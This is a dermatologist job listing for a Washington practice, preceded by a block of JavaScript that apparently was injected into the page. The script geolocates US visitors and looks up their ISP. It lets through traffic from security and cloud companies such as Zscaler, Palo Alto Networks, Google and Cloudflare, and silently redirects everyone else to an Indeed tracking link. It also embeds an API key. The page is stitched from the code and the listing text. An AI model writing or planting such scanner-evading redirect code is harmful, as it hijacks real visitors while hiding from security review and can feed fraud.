Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/8babe794f1b5a680/8e8bd6d32b960528eb6b02ef8538bb9ee43e4bc211f3b02f4a424a6097af8d52/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Seeking a BC/BE Dermatologist for a high-volume multispecialty practice in the scenic Pacific Northwest.
- Opportunities in medical, surgical, and cosmetic dermatology with excellent income potential, benefits, relocation allowance, and partnership options after two years.
- Join a team of over 30 professionals providing comprehensive skin and eye care across six locations serving a population of over 1 million.
- Support includes dedicated medical assistants, advanced practice providers, EMR system, in-house pathology lab, and extensive procedural capabilities like Mohs surgery, laser treatments, phototherapy, and more.
- Competitive compensation ($500K-$750K annually), a 4-day workweek, full health benefits, 401(k), CME allowance, paid time off, and holidays.
- Requires Washington Medical License, board certification/eligibility, and willingness to relocate to University Place, WA.